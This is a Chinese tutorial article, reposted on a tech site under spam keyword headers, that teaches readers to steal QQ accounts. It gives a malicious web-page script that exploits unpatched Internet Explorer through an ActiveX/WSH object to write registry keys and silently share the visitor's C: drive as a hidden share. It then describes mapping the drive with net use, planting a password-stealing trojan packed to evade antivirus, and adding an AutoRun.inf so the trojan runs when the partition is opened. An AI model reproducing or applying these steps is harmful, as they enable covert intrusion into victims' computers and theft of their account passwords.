中文字幕在线观看,亚洲а∨天堂久久精品9966,亚洲成a人片在线观看你懂的,亚洲av成人片无码网站,亚洲国产精品无码久久久五月天

黑客通過網(wǎng)頁竊取QQ方法解析

2017-11-30    來源:

容器云強勢上線!快速搭建集群,上萬Linux鏡像隨意使用

  要想偷別人的QQ,方法有很多了。利用惡意網(wǎng)頁使對方的電腦被共享出來是很有趣的一招。方法是:在你的網(wǎng)站網(wǎng)頁中加入如下內(nèi)容的代碼:

<script language=Java Script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{*********************];
al.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
al.createlnstance()
Shl=al.GetObject() Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flafgs",302,"REG_DWORD");
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD");
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");}
function init()
{setTimeout("f()",1000);}
{********************}
init()
</script>

  上面的代碼大家一定很容易讀懂,簡單說來就是通過修改對方注冊表中的鍵值,把對方的C盤共享出來,如果想讓對方的其他盤都共享請自行設置。

  述代碼中{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代表Windows Scripting Host(WSH)的外殼對象。WSH是微軟提供的一種基于32位Windows平臺的、與語言無關的腳本解釋機制,它使得腳本能夠直接在Windows桌面或命令提示符下運行。WSH使得腳本可以被執(zhí)行,就象執(zhí)行批處理一樣。以“Shl.RegWrite”開頭的這幾句代碼的作用是寫入瀏覽者的注冊表,就是它們使得對方的硬盤被共享的。把“Flags”的鍵值設為00000302可以隱藏共享,使對方無法發(fā)現(xiàn),非常隱蔽。

  網(wǎng)頁做好后,把它上傳你的主頁空間,騙他瀏覽你的網(wǎng)頁(就看你的嘴皮子功夫了),如果對方的IE沒有打補丁(網(wǎng)上這樣的電腦有很多),就可以把他的C盤共享出來。整個方法的原理就是把com.ms.activeX.ActiveXComponent對象嵌入<APPLET>標記中,這樣會導致任意創(chuàng)建和解釋執(zhí)行ActiveX對象,使我們可以創(chuàng)建任意文件、運行程序、寫注冊表。未打補丁的IE,在打開含有上述代碼的網(wǎng)頁時不會有任何警告,我們就是利用這個漏洞把對方的硬盤被共享出來。

  等對方中招后,就把對方的硬盤映射過來,可以使用net use命令,也可以使用網(wǎng)絡刺客II等軟件。下一步可以給對方植入一個盜QQ的軟件,比方說QQ殺手等,注意一定要用ASPack或其他加殼軟件給木馬加殼(其實就是另類“壓縮”),防止殺毒軟件發(fā)現(xiàn)。

  最后,打開記事本鍵入以下內(nèi)容:

[AutoRun]
open=winnt32.exe

  保存為AutoRun.inf,其中的winnt32.exe為木馬文件。把AutoRun.inf和winnt32.exe一起拷到對方某分區(qū)的根目錄下。這樣,只要他雙擊該分區(qū)就會中木馬!這樣可以大大的增加木馬運行的主動性!須知許多人現(xiàn)在都非常警惕,不熟悉的文件他們輕易的不會運行,而這種方法就很難防范了。

  以后,你就等著用郵箱收信收對方的QQ密碼吧。

標簽: 代碼 腳本 漏洞 網(wǎng)絡

版權申明:本站文章部分自網(wǎng)絡,如有侵權,請聯(lián)系:west999com@outlook.com
特別注意:本站所有轉載文章言論不代表本站觀點!
本站所提供的圖片等素材,版權歸原作者所有,如需使用,請與原作者聯(lián)系。

上一篇:企業(yè)如何應對高級閃避技術帶來的新威脅

下一篇:ntfs.dll病毒ntfs.dll木馬清除辦法